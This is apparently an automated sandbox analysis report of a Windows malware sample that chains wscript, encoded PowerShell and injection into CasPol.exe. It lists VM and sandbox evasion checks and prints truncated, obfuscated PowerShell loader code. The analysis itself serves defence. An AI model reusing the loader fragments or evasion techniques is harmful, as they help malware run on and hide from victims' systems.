Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000014.00000002.2190887243.0000000008708000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1900	Thread sleep time: -16602069666338586s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8544	Thread sleep count: 9229 > 30			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8837			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 9229			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 26_2_1DAD0C40 sldt word ptr [eax]

26_2_1DAD0C40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: ModuleInformation

Jump to behavior

Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000014.00000002.2190887243.0000000008708000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 26_2_20B00040 LdrInitializeThunk,

26_2_20B00040

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1350000

Jump to behavior

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs

Jump to dropped file

Encrypted powershell cmdline option found

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $Miljvrnetl = @'Im$HauStvAsoGrrFi9Ti Bi=af Af"AfVDiiRerSptAfuLoaRelKaAPtlAglReoRecPh"StAKodChdLu-BoTIdylepRieAn eq-SkTNeyUnpEseStDCaeOpfVeiPonDeiIdtStiAtoNonKe Ch@Ve"uduFosReiAknafgAs LeSOpyCysSetDieAnmPr;tiuFasApiInnopgIn BaSOpyAksUntVieMemVe.veRovuConextTaiDimLaeSt.VeIBinKotGoeCirAnoFlpYoSTheUnreivUdiGscSheRosPl;OppSyuRabFalMaiWicun AusIntPoaUptSaiGrcDo skcrilMiaWosFrsin StCGilVoaSudInoMygGteStnAreFatLo1Sp{As[GnDbelUnlBuIFymDopFaoVerTrtUn(Ph"KeuUisSuePsrFn3Ap2sk"tr)Gr]EnpPiuOpbStlsaiSpcVi SusPotHaaSktBeiSccUn DieErxPutSveArrWanIn GgiPenMatUn trCPirAaeDeaSltSteKlMBuDPlIinWUniElnstdReoVawMa(LaiAnnSktSt BeNFlvUnhIriEmeCo,AniChnPrtDi FoHLaeKlaBe,driTanFotBe RehPaaFotafcBrhTr,LaiBrnFotTe UnPToiBonMaiDi,MeiNonFjtCh duOMavHeeOrrSaiSl,FoiNanretOv PeRuneAncObiMotElapa,ReiSanCatHa PrOGopAukSnrNo,BrimanIntDa AuCRirProHacHeksk,akiRunHytMe MaAPhuNatYooAssSd,GuiAfnAptSk UnRPleAftSkrWr)Op;Gl[TaDTelHolAnIDomSnpNooaurSktOc(Gl"LiwHyiSanObmacmBa.SmdphlOnlPa"al)Ex]ArpMouSibAalTeiDicRi StsDetMeaCutBeiThcLa CoeDaxErttoeTarAmnRu AriGrnGrtLo heGLeeTatAqDEkrMyiDovjoeHorLiMDooMedEnuFulLieNoHunaVrnKadHelVeeRe(OpiklnKbtUn DaDTeiVrsTa4St0ce)Qu;Ek[anDAflLolUnIHlmEfpUnoPurYntTi(Ba"GauBlsVeeDorUd3Ar2So"Da)Gr]BepBouSkbNelUriOucRa JusamtBraFatSciFicAg IteMaxMotReeDergnnUd CliBrnAdtKu BrIPasUnDHalAsglaBVgufatAbtPsoTrnDeCovhEreStcFakBieDedTi(FoiEmnAltBe PaLTiyNosSakPiust,FoigrnUdtfu AnSImiPonAfiTjsDi9Fe4Ap)af;Sp[FlDTilsalSiISpmBrpLgoEkrPrtOv(Ul"UnAAnDKuVPlABiPHyICo3Ca2Pa.RiDDiLReLda"Sp)Pr]Sup
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $Miljvrnetl = @'Im$HauStvAsoGrrFi9Ti Bi=af Af"AfVDiiRerSptAfuLoaRelKaAPtlAglReoRecPh"StAKodChdLu-BoTIdylepRieAn eq-SkTNeyUnpEseStDCaeOpfVeiPonDeiIdtStiAtoNonKe Ch@Ve"uduFosReiAknafgAs LeSOpyCysSetDieAnmPr;tiuFasApiInnopgIn BaSOpyAksUntVieMemVe.veRovuConextTaiDimLaeSt.VeIBinKotGoeCirAnoFlpYoSTheUnreivUdiGscSheRosPl;OppSyuRabFalMaiWicun AusIntPoaUptSaiGrcDo skcrilMiaWosFrsin StCGilVoaSudInoMygGteStnAreFatLo1Sp{As[GnDbelUnlBuIFymDopFaoVerTrtUn(Ph"KeuUisSuePsrFn3Ap2sk"tr)Gr]EnpPiuOpbStlsaiSpcVi SusPotHaaSktBeiSccUn DieErxPutSveArrWanIn GgiPenMatUn trCPirAaeDeaSltSteKlMBuDPlIinWUniElnstdReoVawMa(LaiAnnSktSt BeNFlvUnhIriEmeCo,AniChnPrtDi FoHLaeKlaBe,driTanFotBe RehPaaFotafcBrhTr,LaiBrnFotTe UnPToiBonMaiDi,MeiNonFjtCh duOMavHeeOrrSaiSl,FoiNanretOv PeRuneAncObiMotElapa,ReiSanCatHa PrOGopAukSnrNo,BrimanIntDa AuCRirProHacHeksk,akiRunHytMe MaAPhuNatYooAssSd,GuiAfnAptSk UnRPleAftSkrWr)Op;Gl[TaDTelHolAnIDomSnpNooaurSktOc(Gl"LiwHyiSanObmacmBa.SmdphlOnlPa"al)Ex]ArpMouSibAalTeiDicRi StsDetMeaCutBeiThcLa CoeDaxErttoeTarAmnRu AriGrnGrtLo heGLeeTatAqDEkrMyiDovjoeHorLiMDooMedEnuFulLieNoHunaVrnKadHelVeeRe(OpiklnKbtUn DaDTeiVrsTa4St0ce)Qu;Ek[anDAflLolUnIHlmEfpUnoPurYntTi(Ba"GauBlsVeeDorUd3Ar2So"Da)Gr]BepBouSkbNelUriOucRa JusamtBraFatSciFicAg IteMaxMotReeDergnnUd CliBrnAdtKu BrIPasUnDHalAsglaBVgufatAbtPsoTrnDeCovhEreStcFakBieDedTi(FoiEmnAltBe PaLTiyNosSakPiust,FoigrnUdtfu AnSImiPonAfiTjsDi9Fe4Ap)af;Sp[FlDTilsalSiISpmBrpLgoEkrPrtOv(Ul"UnAAnDKuVPlABiPHyICo3Ca2Pa.RiDDiLReLda"Sp)Pr]Sup			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noexit -encodedcommand "jabnagkababqahyacgbuaguadabsacaapqagaeaajwanaaoasqbtacqasabhahuauwb0ahyaqqbzag8arwbyahiargbpadkavabpacaaqgbpad0ayqbmacaaqqbmaciaqqbmafyarabpagkaugblahiauwbwahqaqqbmahuatabvageaugblagwaswbhaeeauab0agwaqqbnagwaugblag8augblagmauaboaciacgbtahqaqqblag8azabdaggazabmahualqbcag8avabjagqaeqbsaguacabsagkazqbbag4aiablahealqbtagsavaboaguaeqbvag4acabfahmazqbtahqarabdageazqbpahaazgbwaguaaqbqag8abgbeaguaaqbjagqadabtahqaaqbbahqabwboag8abgblaguaiabdaggaqabwaguaigakahuazab1aeyabwbzafiazqbpaeeaawbuageazgbnaeeacwagaewazqbtae8acab5aemaeqbzafmazqb0aeqaaqblaeeabgbtafaacga7aaoadabpahuargbhahmaqqbwagkasqbuag4abwbwagcasqbuacaaqgbhafmatwbwahkaqqbrahmavqbuahqavgbpaguatqblag0avgblac4adgblafiabwb2ahuaqwbvag4azqb4ahqavabhagkarabpag0atabhaguauwb0ac4avgblaekaqgbpag4aswbvahqarwbvaguaqwbpahiaqqbuag8argbsahaawqbvafmavaboaguavqbuahiazqbpahyavqbkagkarwbzagmauwboaguaugbvahmauabsadsacgbpahaacabtahkadqbsageaygbgageababnageaaqbxagkaywb1ag4aiabbahuacwbjag4adabqag8ayqbvahaadabtageaaqbhahiaywbeag8aiabzagsaywbyagkababnagkayqbxag8acwbgahiacwbpag4aiabtahqaqwbhagkababwag8ayqbtahuazabjag4abwbnahkazwbhahqazqbtahqabgbbahiazqbgageadabmag8amqakafmacab7aeeacwbbaecabgbeagiazqbsafuabgbsaeiadqbjaeyaeqbtaeqabwbwaeyayqbvafyazqbyafqacgb0afuabgaoafaaaaaiaesazqb1afuaaqbzafmadqblafaacwbyaeyabgazaeeacaayahmaawaiahqacgapaecacgbdaeuabgbwafaaaqb1ae8acabiafmadabsahmayqbpafmacabjafyaaqagafmadqbzafaabwb0aegayqbhafmaawb0aeiazqbpafmaywbjafuabgagaeqaaqblaeuacgb4afaadqb0afmadgblaeeacgbyafcayqbuaekabgagaecazwbpafaazqbuae0ayqb0afuabgagahqacgbdafaaaqbyaeeayqblaeqazqbhafmabab0afmadablaesababnaeiadqbeafaababjagkabgbxafuabgbpaeuababuahmadabkafiazqbvafyayqb3ae0ayqaoaewayqbpaeeabgbuafmaawb0afmadaagaeiazqboaeyabab2afuabgboaekacgbpaeuabqblaemabwasaeeabgbpaemaaabuafaacgb0aeqaaqagaeyabwbiaewayqblaesababhaeiazqasagqacgbpafqayqbuaeyabwb0aeiazqagafiazqboafaayqbhaeyabwb0ageazgbjaeiacgboafqacgasaewayqbpaeiacgbuaeyabwb0afqazqagafuabgbqafqabwbpaeiabwbuae0ayqbpaeqaaqasae0azqbpae4abwbuaeyaagb0aemaaaagagqadqbpae0ayqb2aegazqblae8acgbyafmayqbpafmabaasaeyabwbpae4ayqbuahiazqb0ae8adgagafaazqbsahuabgblaeeabgbjae8aygbpae0abwb0aeuababhahaayqasafiazqbpafmayqbuaemayqb0aegayqagafaacgbpaecabwbwaeeadqbrafmabgbyae4abwasaeiacgbpag0ayqbuaekabgb0aeqayqagaeeadqbdafiaaqbyafaacgbvaegayqbjaegazqbrahmaawasageaawbpafiadqbuaegaeqb0ae0azqagae0ayqbbafaaaab1ae4ayqb0afkabwbvaeeacwbzafmazaasaecadqbpaeeazgbuaeeacab0afmaawagafuabgbsafaabablaeeazgb0afmaawbyafcacgapae8acaa7aaoarwbsafsavabhaeqavablagwasabvagwaqqbuaekarabvag0auwbuahaatgbvag8ayqb1ahiauwbrahqatwbjacgarwbsaciatabpahcasab5agkauwbhag4atwbiag0ayqbjag0aqgbhac4auwbtagqacaboagwatwbuagwauabhaciayqbsackarqb4af0aqqbyahaatqbvahuauwbpagiaqqbhagwavablagkarabpagmaugbpacaauwb0ahmarablahqatqblageaqwb1ahqaqgblagkavaboagmatabhacaaqwbvaguarabhahgarqbyahqadabvaguavabhahiaqqbtag4augb1acaaqqbyagkarwbyag4arwbyahqatabvacaaaablaecatablaguavabhahqaqqbxaeqarqbrahiatqb5agkarabvahyaagbvaguasabvahiata
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noexit -encodedcommand "jabnagkababqahyacgbuaguadabsacaapqagaeaajwanaaoasqbtacqasabhahuauwb0ahyaqqbzag8arwbyahiargbpadkavabpacaaqgbpad0ayqbmacaaqqbmaciaqqbmafyarabpagkaugblahiauwbwahqaqqbmahuatabvageaugblagwaswbhaeeauab0agwaqqbnagwaugblag8augblagmauaboaciacgbtahqaqqblag8azabdaggazabmahualqbcag8avabjagqaeqbsaguacabsagkazqbbag4aiablahealqbtagsavaboaguaeqbvag4acabfahmazqbtahqarabdageazqbpahaazgbwaguaaqbqag8abgbeaguaaqbjagqadabtahqaaqbbahqabwboag8abgblaguaiabdaggaqabwaguaigakahuazab1aeyabwbzafiazqbpaeeaawbuageazgbnaeeacwagaewazqbtae8acab5aemaeqbzafmazqb0aeqaaqblaeeabgbtafaacga7aaoadabpahuargbhahmaqqbwagkasqbuag4abwbwagcasqbuacaaqgbhafmatwbwahkaqqbrahmavqbuahqavgbpaguatqblag0avgblac4adgblafiabwb2ahuaqwbvag4azqb4ahqavabhagkarabpag0atabhaguauwb0ac4avgblaekaqgbpag4aswbvahqarwbvaguaqwbpahiaqqbuag8argbsahaawqbvafmavaboaguavqbuahiazqbpahyavqbkagkarwbzagmauwboaguaugbvahmauabsadsacgbpahaacabtahkadqbsageaygbgageababnageaaqbxagkaywb1ag4aiabbahuacwbjag4adabqag8ayqbvahaadabtageaaqbhahiaywbeag8aiabzagsaywbyagkababnagkayqbxag8acwbgahiacwbpag4aiabtahqaqwbhagkababwag8ayqbtahuazabjag4abwbnahkazwbhahqazqbtahqabgbbahiazqbgageadabmag8amqakafmacab7aeeacwbbaecabgbeagiazqbsafuabgbsaeiadqbjaeyaeqbtaeqabwbwaeyayqbvafyazqbyafqacgb0afuabgaoafaaaaaiaesazqb1afuaaqbzafmadqblafaacwbyaeyabgazaeeacaayahmaawaiahqacgapaecacgbdaeuabgbwafaaaqb1ae8acabiafmadabsahmayqbpafmacabjafyaaqagafmadqbzafaabwb0aegayqbhafmaawb0aeiazqbpafmaywbjafuabgagaeqaaqblaeuacgb4afaadqb0afmadgblaeeacgbyafcayqbuaekabgagaecazwbpafaazqbuae0ayqb0afuabgagahqacgbdafaaaqbyaeeayqblaeqazqbhafmabab0afmadablaesababnaeiadqbeafaababjagkabgbxafuabgbpaeuababuahmadabkafiazqbvafyayqb3ae0ayqaoaewayqbpaeeabgbuafmaawb0afmadaagaeiazqboaeyabab2afuabgboaekacgbpaeuabqblaemabwasaeeabgbpaemaaabuafaacgb0aeqaaqagaeyabwbiaewayqblaesababhaeiazqasagqacgbpafqayqbuaeyabwb0aeiazqagafiazqboafaayqbhaeyabwb0ageazgbjaeiacgboafqacgasaewayqbpaeiacgbuaeyabwb0afqazqagafuabgbqafqabwbpaeiabwbuae0ayqbpaeqaaqasae0azqbpae4abwbuaeyaagb0aemaaaagagqadqbpae0ayqb2aegazqblae8acgbyafmayqbpafmabaasaeyabwbpae4ayqbuahiazqb0ae8adgagafaazqbsahuabgblaeeabgbjae8aygbpae0abwb0aeuababhahaayqasafiazqbpafmayqbuaemayqb0aegayqagafaacgbpaecabwbwaeeadqbrafmabgbyae4abwasaeiacgbpag0ayqbuaekabgb0aeqayqagaeeadqbdafiaaqbyafaacgbvaegayqbjaegazqbrahmaawasageaawbpafiadqbuaegaeqb0ae0azqagae0ayqbbafaaaab1ae4ayqb0afkabwbvaeeacwbzafmazaasaecadqbpaeeazgbuaeeacab0afmaawagafuabgbsafaabablaeeazgb0afmaawbyafcacgapae8acaa7aaoarwbsafsavabhaeqavablagwasabvagwaqqbuaekarabvag0auwbuahaatgbvag8ayqb1ahiauwbrahqatwbjacgarwbsaciatabpahcasab5agkauwbhag4atwbiag0ayqbjag0aqgbhac4auwbtagqacaboagwatwbuagwauabhaciayqbsackarqb4af0aqqbyahaatqbvahuauwbpagiaqqbhagwavablagkarabpagmaugbpacaauwb0ahmarablahqatqblageaqwb1ahqaqgblagkavaboagmatabhacaaqwbvaguarabhahgarqbyahqadabvaguavabhahiaqqbtag4augb1acaaqqbyagkarwbyag4arwbyahqatabvacaaaablaecatablaguavabhahqaqqbxaeqarqbrahiatqb5agkarabvahyaagbvaguasabvahiata			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsA